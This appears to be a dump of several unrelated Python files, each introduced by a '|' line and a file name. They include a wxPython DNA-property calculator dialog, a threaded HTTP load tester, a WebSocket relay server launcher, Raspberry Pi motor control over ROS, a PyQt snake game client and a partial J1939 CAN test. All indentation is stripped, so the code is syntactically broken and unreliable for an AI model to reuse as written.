head = wx.StaticText(self ,label = "Estimate properties",style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(16, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 8)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBox = wx.BoxSizer(wx.HORIZONTAL)
self.butChoose = wx.Button(self , label = "Choose File")
self.hBox.Add(self.butChoose,flag = wx.LEFT | wx.RIGHT | wx.ALIGN_CENTER_VERTICAL , border = 10,proportion = 1)
path = wx.StaticText(self, label = "Select a DNA File from your File System",style = wx.ALIGN_CENTER_VERTICAL)
self.hBox.Add(path,flag = wx.ALIGN_CENTER_VERTICAL,proportion = 2)
self.vBox.Add(self.hBox)
self.hBox1 = wx.BoxSizer(wx.HORIZONTAL)
text1 = wx.StaticText(self, label = " Enter Na+ salt concentration (mM) :\t",style = wx.ALIGN_CENTER)
self.saltText = wx.TextCtrl(self,name = "Salt Concentration",size = (200,25))
self.hBox1.Add(text1)
self.hBox1.Add(self.saltText)
self.vBox.Add(self.hBox1,flag = wx.TOP | wx.BOTTOM , border = 8)
self.hBox2 = wx.BoxSizer(wx.HORIZONTAL)
text1 = wx.StaticText(self, label = " Enter base pair cost ($) :\t\t\t\t",style = wx.ALIGN_CENTER)
self.priceText = wx.TextCtrl(self,name = "Price",size = (200,25))
self.hBox2.Add(text1)
self.hBox2.Add(self.priceText)
self.vBox.Add(self.hBox2,flag = wx.TOP | wx.BOTTOM , border = 8)
line2 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 15)
self.txt = wx.TextCtrl(self,name = "hBox",size = (200,250),style= wx.TE_READONLY | wx.TE_MULTILINE)
self.vBox.Add(self.txt,flag = wx.EXPAND | wx.ALL , border = 10)
head = wx.StaticText(self ,label = "Disclaimer:This values are just an approximation and the actual values may vary",style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(12, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT |wx.ALIGN_CENTER_HORIZONTAL | wx.RIGHT, border = 10)
line2 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 15)
self.hBox3 = wx.BoxSizer(wx.HORIZONTAL)
self.butCalc = wx.Button(self , label = "Calculate")
self.butCancel = wx.Button(self, label = "Close")
self.butSave = wx.Button(self , label = "Save")
self.hBox3.Add(self.butCalc,proportion = 1, flag = wx.LEFT | wx.RIGHT , border = 5)
self.hBox3.Add(self.butSave,proportion = 1, flag = wx.LEFT | wx.RIGHT , border = 5)
self.hBox3.Add(self.butCancel,proportion = 1, flag = wx.LEFT | wx.RIGHT , border = 5)
self.vBox.Add(self.hBox3,flag = wx.ALIGN_CENTER_HORIZONTAL | wx.TOP | wx.BOTTOM, border = 5)
self.SetSizer(self.vBox)
self.SetSize((500,580))
self.butChoose.Bind(wx.EVT_BUTTON,self.onChoose)
self.butCancel.Bind(wx.EVT_BUTTON,self.onCancel)
self.butCalc.Bind(wx.EVT_BUTTON,self.calc)
self.butSave.Bind(wx.EVT_BUTTON,self.onSave)
self.butSave.Disable()
self.path = None
def onChoose(self,e):
self.butSave.Disable()
self.txt.Clear()
self.priceText.Clear()
self.saltText.Clear()
fileSelector = wx.FileDialog(self, message="Choose a file",defaultFile="",style=wx.OPEN | wx.MULTIPLE | wx.CHANGE_DIR )
if fileSelector.ShowModal() == wx.ID_OK:
paths = fileSelector.GetPaths()
self.path = unicodedata.normalize('NFKD', paths[0]).encode('ascii','ignore')
self.txt.WriteText("#File Selected : " + self.path)
fileSelector.Destroy()
def calc(self,e):
self.txt.Clear()
if self.path != None:
if not self.saltText.IsEmpty() and not self.priceText.IsEmpty() and FILE_EXT in self.path:
"""
tempTuple = extraModules.getGCContent(self.path)
noOfGCPairs = tempTuple[0]; self.minGC = (tempTuple[1] * 100)/OLIGO_SIZE; self.maxGC = (tempTuple[2] * 100)/OLIGO_SIZE
print tempTuple[0] , tempTuple[1] , tempTuple[2]
totalPairs = os.path.getsize(PATH + "/../.temp/dnaString.txt")
self.GCContent = (noOfGCPairs * 100)/totalPairs
self.totalCost = int(self.priceText.GetString(0,self.priceText.GetLastPosition())) * totalPairs
naContent = int(self.saltText.GetString(0,self.saltText.GetLastPosition()))
self.minMeltingPoint = (81.5 + 16.6 * math.log10(naContent) + 0.41 * (self.minGC) - 600)/OLIGO_SIZE
self.maxMeltingPoint = (81.5 + 16.6 * math.log10(naContent) + 0.41 * (self.maxGC) - 600)/OLIGO_SIZE
self.details = "#Details for the DNA :\n\n- GC Content(% in DNA String):\t\t\t" + `self.GCContent` + "\n- Total Cost($ of DNA String):\t\t\t" + `self.totalCost` + "\n- Min Melting Point(℃/nucleotide):\t" + str(self.minMeltingPoint) + "\n- Max Melting Point(℃/nucleotide):\t" + str(self.maxMeltingPoint)
"""
con = sqlite3.connect(PATH + '/../database/prefs.db')
with con:
cur = con.cursor()
WORKSPACE_PATH = cur.execute('SELECT * FROM prefs WHERE id = 8').fetchone()[1]
if "linux" in sys.platform:
WORKSPACE_PATH = unicodedata.normalize('NFKD', WORKSPACE_PATH).encode('ascii','ignore')
if not os.path.isdir(WORKSPACE_PATH + '/.temp'):
os.mkdir(WORKSPACE_PATH + '/.temp')
try:
float(self.saltText.GetString(0,self.saltText.GetLastPosition()))
float(self.saltText.GetString(0,self.saltText.GetLastPosition()))
except ValueError:
wx.MessageDialog(self,'Please fill numbers and not alphabets', 'Error',wx.OK | wx.ICON_ERROR | wx.STAY_ON_TOP).ShowModal()
return
self.naContent = float(self.saltText.GetString(0,self.saltText.GetLastPosition()))
self.costPerBase = float(self.priceText.GetString(0,self.priceText.GetLastPosition()))
if 'darwin' in sys.platform:
p = threading.Thread(name = "GC Content Grabber", target = extraModules.getGCContent, args = (self.path,self.costPerBase,self.naContent,))
else:
p = multiprocessing.Process(target = extraModules.getGCContent , args = (self.path,self.costPerBase,self.naContent,) , name = "Checking Details Process")
p.start()
temp = wx.ProgressDialog('Please wait...','Analysing the String....This may take a while....' ,parent = self,style = wx.PD_APP_MODAL | wx.PD_CAN_ABORT | wx.PD_ELAPSED_TIME)
terminated = False
temp.SetSize((450,180))
if 'darwin' in sys.platform:
while p.isAlive():
time.sleep(0.1)
if not temp.UpdatePulse("Encoding the File....This may take several minutes...\n\tso sit back and relax.....")[0]:
wx.MessageDialog(self,'Cannot be stopped.Sorry', 'Information!',wx.OK | wx.ICON_INFORMATION | wx.STAY_ON_TOP).ShowModal()
temp.Destroy()
if not p.isAlive():
p.join()
else:
while len(multiprocessing.active_children()) != 0:
time.sleep(0.1)
if not temp.UpdatePulse("Analysing the File....This may take several minutes...\n\tso sit back and relax.....")[0]:
p.terminate()
terminated = True
break
p.join()
temp.Destroy()
p.terminate()
if not terminated:
tempFile = open(WORKSPACE_PATH + "/.temp/details.txt","rb")
self.details = tempFile.read()
self.txt.WriteText(self.details)
tempFile.close()
self.butSave.Enable()
else:
wx.MessageDialog(self,'Make sure you filled the required details and .dnac file is selected', 'Error',wx.OK | wx.ICON_ERROR | wx.STAY_ON_TOP).ShowModal()
else:
wx.MessageDialog(self,'Make sure you selected a .dnac file', 'Error',wx.OK | wx.ICON_ERROR | wx.STAY_ON_TOP).ShowModal()
def onSave(self,e):
con = sqlite3.connect(PATH + '/../database/prefs.db')
with con:
cur = con.cursor()
WORKSPACE_PATH = cur.execute('SELECT * FROM prefs WHERE id = 8').fetchone()[1]
if "linux" in sys.platform:
WORKSPACE_PATH = unicodedata.normalize('NFKD', WORKSPACE_PATH).encode('ascii','ignore')
if not os.path.isdir(WORKSPACE_PATH + '/.temp'):
os.mkdir(WORKSPACE_PATH +'/.temp')
## if string == 'None':
## locationSelector = wx.FileDialog(self,"Please select location to save your details",style = wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT)
## if locationSelector.ShowModal() == wx.ID_OK:
## paths = locationSelector.GetPath()
## self.savePath = paths
##
## propFile = file(self.savePath + ".txt","w")
## propFile.write("#Input Details:-\n\n- Salt Concentration :\t\t" + str(self.naContent) + "\n- Cost per Base :\t\t" + str(self.costPerBase) + "\n\n" + self.details)
## #propFile.write("\n\n\n © 2013 - GUPTA RESEARCH LABS - Generated by DNA-CLOUD")
##
## wx.MessageDialog(self,'Details written to file', 'Info',wx.OK | wx.ICON_INFORMATION | wx.STAY_ON_TOP).ShowModal()
## else:
## locationSelector.Destroy()
## del locationSelector
xtime = datetime.now().timetuple()
self.savePath = WORKSPACE_PATH + "/details_encodedFile_" + `xtime[2]` + "_" + `xtime[1]` + "_" + `xtime[0]`
propFile = file(self.savePath + ".txt","w")
propFile.write("#Input Details:-\n\n- Salt Concentration :\t\t" + str(self.naContent) + "\n- Cost per Base :\t\t" + str(self.costPerBase) + "\n\n" + self.details)
wx.MessageDialog(self,'Details written to file', 'Info',wx.OK | wx.ICON_INFORMATION | wx.STAY_ON_TOP).ShowModal()
def onCancel(self,e):
self.Destroy()
|
load_test.py
|
# coding:utf-8
import time
import urllib2
import threading
from Queue import Queue
from time import sleep
import sys
# 性能测试页面
#PERF_TEST_URL = "http://10.2.66.38/?yyid=-1&suv=1309231700203264&callback=xxxxx"
URLS = [line for line in open("urls", "r")]
# 配置:压力测试
THREAD_NUM = 10 # 并发线程总数
ONE_WORKER_NUM = 500 # 每个线程的循环次数
LOOP_SLEEP = 0.01 # 每次请求时间间隔(秒)
# 配置:模拟运行状态
#THREAD_NUM = 10 # 并发线程总数
#ONE_WORKER_NUM = 10 # 每个线程的循环次数
#LOOP_SLEEP = 0 # 每次请求时间间隔(秒)
# 出错数
ERROR_NUM = 0
#具体的处理函数,负责处理单个任务
def doWork(index, url):
t = threading.currentThread()
#print "["+t.name+" "+str(index)+"] "+PERF_TEST_URL
try:
html = urllib2.urlopen(url).read()
except urllib2.URLError, e:
print "["+t.name+" "+str(index)+"] "
print e
global ERROR_NUM
ERROR_NUM += 1
#这个是工作进程,负责不断从队列取数据并处理
def working():
t = threading.currentThread()
print "["+t.name+"] Sub Thread Begin"
i = 0
while i < ONE_WORKER_NUM:
i += 1
doWork(i, URLS[i % len(URLS)])
sleep(LOOP_SLEEP)
print "["+t.name+"] Sub Thread End"
def main():
#doWork(0)
#return
t1 = time.time()
Threads = []
# 创建线程
for i in range(THREAD_NUM):
t = threading.Thread(target=working, name="T"+str(i))
t.setDaemon(True)
Threads.append(t)
for t in Threads:
t.start()
for t in Threads:
t.join()
print "main thread end"
t2 = time.time()
print "========================================"
#print "URL:", PERF_TEST_URL
print "任务数量:", THREAD_NUM, "*", ONE_WORKER_NUM, "=", THREAD_NUM*ONE_WORKER_NUM
print "总耗时(秒):", t2-t1
print "每次请求耗时(秒):", (t2-t1) / (THREAD_NUM*ONE_WORKER_NUM)
print "每秒承载请求数:", 1 / ((t2-t1) / (THREAD_NUM*ONE_WORKER_NUM))
print "错误数量:", ERROR_NUM
if __name__ == "__main__":
main()
|
__main__.py
|
import time
import threading
import traceback
import argparse
import logging
from . import appserver, controlserver
parser = argparse.ArgumentParser(description="Run a Vibrance relay server "
"(command server and client WebSocket "
"servers).")
parser.add_argument("--psk", help="Optional password for the command server.")
parser.add_argument("--cert", help="SSL certificate for securing the "
"WebSockets and the command server.")
parser.add_argument("--key", help="SSL private key for securing the WebSockets"
" and the command server.")
log_levels = {"DEBUG": logging.DEBUG, "INFO": logging.INFO,
"WARNING": logging.WARNING, "ERROR": logging.ERROR,
"CRITICAL": logging.CRITICAL}
parser.add_argument("--debug", help=f"Debug level {log_levels.keys()}",
default="CRITICAL", choices=log_levels.keys())
args = parser.parse_args()
logging.basicConfig(level=log_levels[args.debug])
def wrapLoop(loopfunc):
"""Wraps a thread in a wrapper function to restart it if it exits."""
def wrapped():
while True:
try:
loopfunc()
except BaseException:
print(f"Exception in thread {loopfunc},"
" restarting in 10s...")
traceback.print_exc()
else:
print(f"Thread {loopfunc} exited, restarting in 10s...")
time.sleep(10)
return wrapped
appServer = appserver.AppServer(args.cert, args.key)
controlServer = controlserver.ControlServer(appServer, args.psk,
args.cert, args.key)
appServerThread = threading.Thread(target=wrapLoop(appServer.run))
controlServerThread = threading.Thread(target=wrapLoop(controlServer.run))
appCheckAliveThread = threading.Thread(
target=wrapLoop(appServer.handleCheckAlive))
appServerThread.start()
controlServerThread.start()
appCheckAliveThread.start()
while True:
time.sleep(1)
|
Motor.py
|
#######################################################
# LOVE_DEATH_ROBOTS #
#######################################################
import RPi.GPIO as GPIO
import time
import threading
import roslibpy
# Haversine gives the GPS coords of the base station
from Haversine import setTargetHeading as Haversine
client = roslibpy.Ros(host='192.168.1.2', port=9090)
#tells the program what ROS topic it should be listening to
listener = roslibpy.Topic(client, '/gnss','fake_sensor_test/gps')
#sets IP address and port number used
listener2 = roslibpy.Topic(client, '/baseIMU','std_msgs/String')
# a function to begin listening and subscribe to the topic listed above
def start_listening():
listener.subscribe(receive_message)
def start_listening2():
listener2.subscribe(receive_message2)
#prints out the message and sets variables (both recieve_message functions)
def receive_message(message):
print("start receive message")
global roverLat, roverLon, baseLon, baseLat
print(message['roverLat'],message['roverLon'])
roverLat = message['roverLat']
roverLon = message['roverLon']
baseLon = message['baseLon']
baseLat = message['baseLat']
print ("end receive message")
def receive_message2(message):
global data
data = message['data']
#runs the motor
def main():
GPIO.setmode(GPIO.BCM)
# these are the pins in use and MUST BE USED to control the motor on the base station
control_pins = [4,17,11]
# sets up the pins for the raspberry pi
for pin in control_pins:
GPIO.setup(pin, GPIO.OUT)
GPIO.output(pin, 0)
timestamp = time.time()
#Target = Have.setTargetHeading((lat1,lon1), (x,y))
Have = Haversine((baseLat, baseLon), (roverLat,roverLon))
# if the degree of the rover is higher than the IMU the below function will run
if (Have > float(data)):
GPIO.output(4,1)
# The while function adds a tolerance of 3 to the IMU to prevent constant movement
while(int(Have) not in range(int(float(data) - 5),int(float(data) + 5))):
for x in range(30):
GPIO.output(11,1)
time.sleep(.00005)
GPIO.output(11,0)
time.sleep(.00005)
# if the degree of the Rover is lower than the IMU the below function will run
else:
GPIO.output(4,0)
# The while function adds a tolerance of 3 to the IMU to prevent constant movement
while(int(Have) not in range(int(float(data) - 5), int(float(data) + 5))):
for x in range(30):
GPIO.output(11,1)
time.sleep(.00005)
GPIO.output(11,0)
time.sleep(.00005)
# Initialize variables
data = baseLat = roverLat = baseLon = roverLon = 0
# converts the Haversine((lat1, lon1), (lat2, lon2)) function to be called by "Have" instead of the entire function
Have = Haversine((baseLat,baseLon), (roverLat,roverLon))
client.run()
# starts listening and returning values
client.on_ready(start_listening())
#sets IP address and port number used
client.on_ready(start_listening2())
#thread to run main while rosbridge collect data
threading.Thread(target=main).start()
GPIO.cleanup()
|
game.py
|
import engine_revised
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from PyQt5.QtMultimedia import *
import sys
from client import Client
from threading import Thread
import protobuffer_pb2 as game
from time import sleep
selectedColor = QtGui.QColor(255, 85, 255)
userName = str
class Mainwindow(QMainWindow):
def __init__(self, name):
super(Mainwindow, self).__init__()
self.name = name
self.setupUi(self)
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(1050, 750)
self.board = Board(self)
self.setCentralWidget(self.board)
self.board.setObjectName("board")
self.board.start()
self.scoreboard = QtWidgets.QTextEdit(self.board)
self.scoreboard.setGeometry(QtCore.QRect(10, 10, 200, 300))
self.scoreboard.setFont(QFont("Arial", 12))
self.scoreboard.setStyleSheet("background: rgba(247, 247, 247, .5); color: black")
self.scoreboard.setObjectName("scoreboard")
self.scoreboard.setEnabled(False)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setStyleSheet("background: rgb(240, 240, 240)")
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.soundeffect = QSoundEffect(MainWindow)
self.soundeffect.setSource(QUrl.fromLocalFile("gamemusic.wav"))
self.soundeffect.setVolume(0.25)
self.soundeffect.setObjectName("soundeffect")
self.soundeffect.setLoopCount(100)
self.radioButton = QtWidgets.QRadioButton(self.board)
self.radioButton.setObjectName("radioButton")
self.radioButton.setGeometry(QtCore.QRect(10, 650, 61, 20))
self.radioButton.toggled.connect(lambda:self.btnstate(self.radioButton))
self.radioButton.setChecked(False)
self.label = QLabel(MainWindow)
self.label.setObjectName("label")
self.label.setGeometry(QRect(140, -47, 201, 200))
self.label.setStyleSheet("font: 20pt \"8514oem\";")
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def btnstate(self, radioButton):
if radioButton.isChecked() == True:
self.soundeffect.play()
else:
self.soundeffect.stop()
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "Snok"))
self.scoreboard.setHtml(_translate("MainWindow", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'MS Shell Dlg 2\'; font-size:7.8pt; font-weight:400; font-style:normal;\">\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p></body></html>"))
self.statusbar.showMessage(_translate("statusbar", self.name))
self.radioButton.setText(_translate("MainWindow", "Music"))
self.statusbar.setStyleSheet(_translate("Statusbar", "Font: 10pt"))
class Ui_Form(QWidget):
def __init__(self, parent):
super(Ui_Form, self).__init__(parent)
self.parent = parent
self.setupUi(self)
def setupUi(self, QWidget):
QWidget.setObjectName("Widget")
QWidget.resize(346, 268)
QWidget.setGeometry(350,100,346,268)
self.quitButton = QtWidgets.QPushButton(QWidget)
self.quitButton.setObjectName("quitButton")
self.quitButton.setGeometry(QRect(0, 170, 110, 28))
self.quitButton.setStyleSheet("background:rgb(255, 85, 0)")
self.quitButton.clicked.connect(self.quitGame)
self.playButton = QtWidgets.QPushButton(QWidget)
self.playButton.setObjectName("playButton")
self.playButton.setGeometry(QRect(116, 170, 110, 28))
self.playButton.setStyleSheet("background:rgb(85, 170, 255)")
self.playButton.clicked.connect(self.playAgian)
self.scoreButton = QtWidgets.QPushButton(QWidget)
self.scoreButton.setObjectName("scoreButton")
self.scoreButton.setGeometry(QRect(232, 170, 110, 28))
self.scoreButton.setStyleSheet("background:rgb(245, 252, 36)")
self.scoreButton.clicked.connect(self.showScores)
self.quitButton.setCursor(QCursor(Qt.PointingHandCursor))
self.playButton.setCursor(QCursor(Qt.PointingHandCursor))
self.scoreButton.setCursor(QCursor(Qt.PointingHandCursor))
self.gameOver = QtWidgets.QLabel(QWidget)
self.gameOver.setObjectName("gameOver")
self.gameOver.setGeometry(QRect(120, 30, 201, 61))
self.gameOver.setStyleSheet("font: 12pt \"8514oem\";")
self.label = QtWidgets.QLabel(QWidget)
self.label.setObjectName("label")
self.label.setGeometry(QRect(100, 90, 201, 41))
self.label.setStyleSheet("font: 12pt \"8514oem\";")
self.retranslateUi(QWidget)
QMetaObject.connectSlotsByName(QWidget)
def quitGame(self):
QApplication.instance().quit()
def playAgian(self):
self.parent.start()
self.close()
def showScores(self):
self.highscore = HighScoreWidget()
self.highscore.show()
def retranslateUi(self, QWidget):
_translate = QtCore.QCoreApplication.translate
QWidget.setWindowTitle(_translate("Widget", "Game Over!"))
self.quitButton.setText(_translate("Widget", "Quit"))
self.playButton.setText(_translate("Widget", "Play Again"))
self.scoreButton.setText(_translate("Widget", "Show Highscores"))
self.gameOver.setText(_translate("Widget", "GAME OVER"))
self.label.setText(_translate("Widget", "Final Score : "+final_score))
class Board(QFrame):
snok_score =[]
def __init__(self, parent):
super(Board, self).__init__(parent)
self.WIDTHINBLOCKS = 105
self.HEIGHTINBLOCKS = 75
self.SPEED = 17
self.parent = parent
self.screen_width = int(self.parent.width())
self.screen_height = int(self.parent.height())
self.setFocusPolicy(Qt.StrongFocus)
self.engine = engine_revised.Engine()
self.client = Client(userName, self.engine)
self.client.send_action("w")
self.timer = QBasicTimer()
self.direction = "w"
self.food = []
self.board = []
self.snakes_score = []
self.data = game.Data()
self.data.alive = False
self.data_thread = Thread(target=self.game_data_loop, daemon=True)
self.data_thread.start()
while not self.data.alive:
sleep(0.5)
def game_data_loop(self):
while True:
self.data = self.client.gotten_data.get()
def rec_width(self):
return self.contentsRect().width() / self.WIDTHINBLOCKS
def rec_height(self):
return self.contentsRect().height() / self.HEIGHTINBLOCKS
def start(self):
self.timer.start(self.SPEED, self)
if not self.data_thread.is_alive():
self.data_thread.start()
self.client.send_action("w")
self.data.alive = False
while not self.data.alive:
sleep(0.5)
def paintEvent(self, event):
painter = QPainter(self)
rect = self.contentsRect()
global selectedColor
boardtop = rect.bottom() - self.HEIGHTINBLOCKS * self.rec_height()
#data = self.client.gotten_data.get()
#self.data.snakes[:]
mini_data = game.Data()
mini_data.snakes.extend(self.data.snakes)
mini_data.foods.extend(self.data.foods)
mini_data.walls.extend(self.data.walls)
self.items = self.engine.get_items_on_screen(userName, mini_data, self.WIDTHINBLOCKS, self.HEIGHTINBLOCKS)
#print('Getting moves: ', self.items)
for item in self.items:
if item.skin == '@':
self.draw_square(painter,rect.left() + item.x * self.rec_width(), boardtop + item.y * self.rec_height(), selectedColor)
elif item.skin == 'O':
self.draw_square(painter, rect.left() + item.x * self.rec_width(), boardtop + item.y * self.rec_height(), selectedColor)
elif item.skin == 'A':
color = QColor(255, 0, 0)
self.draw_square(painter, rect.left() + item.x * self.rec_width(), boardtop + item.y * self.rec_height(),color )
elif item.skin == '%':
color = QColor(255, 214, 0)
self.draw_square(painter, rect.left() + item.x * self.rec_width(), boardtop + item.y * self.rec_height() ,color )
elif item.skin == '#':
color = QColor(0, 0, 0)
self.draw_square(painter, rect.left() + item.x * self.rec_width(), boardtop + item.y * self.rec_height() ,color )
#Other Snake
elif item.skin == '¤':
color = QColor(0, 0, 255)
self.draw_square(painter, rect.left() + item.x * self.rec_width(), boardtop + item.y * self.rec_height() ,color )
elif item.skin == '§':
color = QColor(0, 0, 139)
self.draw_square(painter, rect.left() + item.x * self.rec_width(), boardtop + item.y * self.rec_height() ,color )
def draw_square(self, painter, x, y, QColor):
painter.fillRect(int(x) , int(y) , int(self.rec_width()) -2 , int(self.rec_height()) -2 , QColor)
def timerEvent(self, event):
if event.timerId() == self.timer.timerId():
scores = []
for snake in self.data.snakes:
scores.append((snake.id, snake.score))
if userName == snake.id:
global final_score
final_score = str(snake.score)
scores.sort(key=lambda x : x[1], reverse=True)
score_string = ""
for i, (id, score) in enumerate(scores):
if i == 20:
break
score_string += f"{id}: {score}\n"
self.parent.scoreboard.setPlainText(score_string)
if not self.data.alive:
self.gameover()
self.timer.stop()
self.update()
def gameover(self):
self.gameoverWidget = Ui_Form(self)
self.gameoverWidget.show()
def keyPressEvent(self, event):
key = event.key()
if key == Qt.Key_W or key == Qt.Key_Up:
self.client.send_action("w")
self.direction = 'w'
print('you pressed w')
if key == Qt.Key_A or key == Qt.Key_Left:
self.client.send_action("a")
self.direction = 'a'
print("you pressed a")
if key == Qt.Key_D or key == Qt.Key_Right:
self.client.send_action("d")
self.direction = 'd'
print("you pressed d")
if key == Qt.Key_S or key == Qt.Key_Down:
self.client.send_action("s")
self.direction = 's'
print("you pressed s")
class HighScoreWidget(QWidget):
def __init__(self, ):
super(HighScoreWidget, self).__init__()
self.setUp(self)
def setUp(self, Widget):
Widget.setObjectName("Widget")
Widget.resize(600, 500)
Widget.setStyleSheet("background: rgb(255,255,224)")
self.titlelabel = QtWidgets.QLabel(Widget)
self.titlelabel.setObjectName("title")
self.titlelabel.setGeometry(QtCore.QRect(230, 20, 150, 20))
self.titlelabel.setStyleSheet("Font: 15pt")
self.top = QtWidgets.QLabel(Widget)
self.top.setObjectName("top")
self.top.setGeometry(QtCore.QRect(250, 70, 150, 25))
self.top.setStyleSheet("Font: 12pt")
self.scoreboard = QtWidgets.QTextEdit(Widget)
self.scoreboard.setEnabled(False)
self.scoreboard.setGeometry(QtCore.QRect(160, 120, 250, 300))
self.scoreboard.setFont(QFont("Arial", 12))
self.scoreboard.setStyleSheet("background: rgba(247, 247, 247, .5); color: black")
self.scoreboard.setObjectName("scoreboard")
self.engine = engine_revised.Engine()
self.client = Client(userName, self.engine)
self.scorelist = self.client.get_high_scores()
stringscore = ''
for highscore in self.scorelist.scores:
stringscore += (str(highscore.id)+' : '+str(highscore.score)+ '\n')
self.scoreboard.setPlainText(stringscore)
self.retranslateUi(Widget)
QtCore.QMetaObject.connectSlotsByName(Widget)
def retranslateUi(self, Widget):
_translate = QtCore.QCoreApplication.translate
Widget.setWindowTitle(_translate("Widget", "Highscore"))
self.titlelabel.setText(_translate("Widget", "Leaderboard"))
self.top.setText(_translate("Widget", "Top 10"))
class LoginDialog(QDialog):
def __init__(self):
super().__init__()
self.setupUi(self)
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(540, 200)
Dialog.setStyleSheet("background: rgb(172, 172, 172)")
self.userLabel = QtWidgets.QLabel(Dialog)
self.userLabel.setGeometry(QtCore.QRect(10, 20, 241, 22))
self.userLabel.setObjectName("enter_nickname")
self.userLabel.setStyleSheet("Font: 8pt")
self.pick = QtWidgets.QLabel(Dialog)
self.pick.setGeometry(QtCore.QRect(10,50, 241, 22))
self.pick.setObjectName("pick_color")
self.pick.setStyleSheet("Font: 8pt")
self.userName = QtWidgets.QLineEdit(Dialog)
self.userName.setGeometry(QtCore.QRect(125, 20, 241, 22))
self.userName.setObjectName("userName")
self.userName.setStyleSheet("background: rgb(255, 255, 255)")
self.userName.setMaxLength(7)
self.userName.setPlaceholderText("can only use up to 7 letters :)")
self.enterGame = QtWidgets.QPushButton(Dialog)
self.enterGame.setGeometry(QtCore.QRect(170, 125, 175, 50))
self.enterGame.setObjectName("enterGame")
self.enterGame.clicked.connect(self.enter_game)
self.enterGame.setStyleSheet("background: rgb(130, 255, 127)")
self.enterGame.setCursor(QCursor(Qt.PointingHandCursor))
self.pickcolor = QtWidgets.QPushButton(Dialog)
self.pickcolor.setGeometry(QtCore.QRect(125, 50, 241, 28))
self.pickcolor.setObjectName("pickcolor")
self.pickcolor.setStyleSheet("background: rgb(255, 255, 255)")
self.pickcolor.clicked.connect(self.colorDialog)
self.pickcolor.setCursor(QCursor(Qt.PointingHandCursor))
self.framecolor = QtWidgets.QFrame(Dialog)
self.framecolor.setGeometry(QtCore.QRect(390, 30, 100, 75))
self.instructions = QtWidgets.QLabel(Dialog)
self.instructions.setGeometry(QtCore.QRect(140, 90, 241, 22))
self.instructions.setObjectName("instructions")
self.instructions.setStyleSheet("Font: 8pt")
self.framecolor.setStyleSheet("QWidget { background-color: %s}" %selectedColor.name())
self.retranslateUi(Dialog)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def colorDialog(self):
color = QColorDialog.getColor()
if color.isValid():
self.framecolor.setStyleSheet("QWidget { background-color: %s}" %color.name())
global selectedColor
selectedColor = color
def enter_game(self):
name = self.userName.text()
global userName
userName=name
self.main = Mainwindow(name)
self.main.show()
self.deleteLater()
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Get ready to play Snok!"))
self.enterGame.setText(_translate("Dialog", "Enter Game"))
self.enterGame.setText(_translate("Dialog", "Enter Game"))
self.pickcolor.setText(_translate("Dialog", "Pick Color"))
self.userLabel.setText(_translate("Dialog", "Enter nickname: "))
self.pick.setText(_translate("Dialog", "Choose your color: "))
self.instructions.setText(_translate("Dialog", 'Move with "WASD" or the arrowkeys!'))
def main():
app = QtWidgets.QApplication(sys.argv)
login = LoginDialog()
login.setWindowFlags(Qt.Window)
login.show()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
|
test_ca.py
|
# for standalone-test
import sys
sys.path.append(".")
import unittest
import time
import threading
try:
# Python27
import Queue as queue
except ImportError:
# Python35
import queue
import j1939
class TestCA(unittest.TestCase):
# TODO: should we change the async_can_feeder to use the can backend with
# bustype 'virtual' instead of injecting our messages directly?
class MsgType(object):
CANRX = 0
CANTX = 1
PDU = 2
def _async_can_feeder(self):
"""Asynchronous feeder"""
while True:
message = self.message_queue.get(block=True)
if message is self.STOP_THREAD:
break
recv_time = message[3]
if recv_time == 0.0:
recv_time = time.time()
self.ecu.notify(message[1], message[2], recv_time)
def _inject_messages_into_ecu(self):
while self.can_messages and self.can_messages[0][0] == TestCA.MsgType.CANRX:
message = self.can_messages.pop(0)
self.message_queue.put(message)
def _send_message(self, can_id, data):
"""Will be used instead of the usual ecu.send_message method.
Checks the message sent and generates the apropriate answer.
The data is fed from self.can_messages.
"""
expected_data = self.can_messages.pop(0)
self.assertEqual(expected_data[0], TestCA.MsgType.CANTX, "No transmission was expected")
self.assertEqual(can_id, expected_data[1])
self.assertSequenceEqual(data, expected_data[2])
self._inject_messages_into_ecu()
def _on_message(self, pgn, data):
"""Feed incoming message to this testcase.
:param int pgn:
Parameter Group Number of the message
:param bytearray data:
Data of the PDU
"""
expected_data = self.pdus.pop(0)
self.assertEqual(expected_data[0], TestCA.MsgType.PDU)
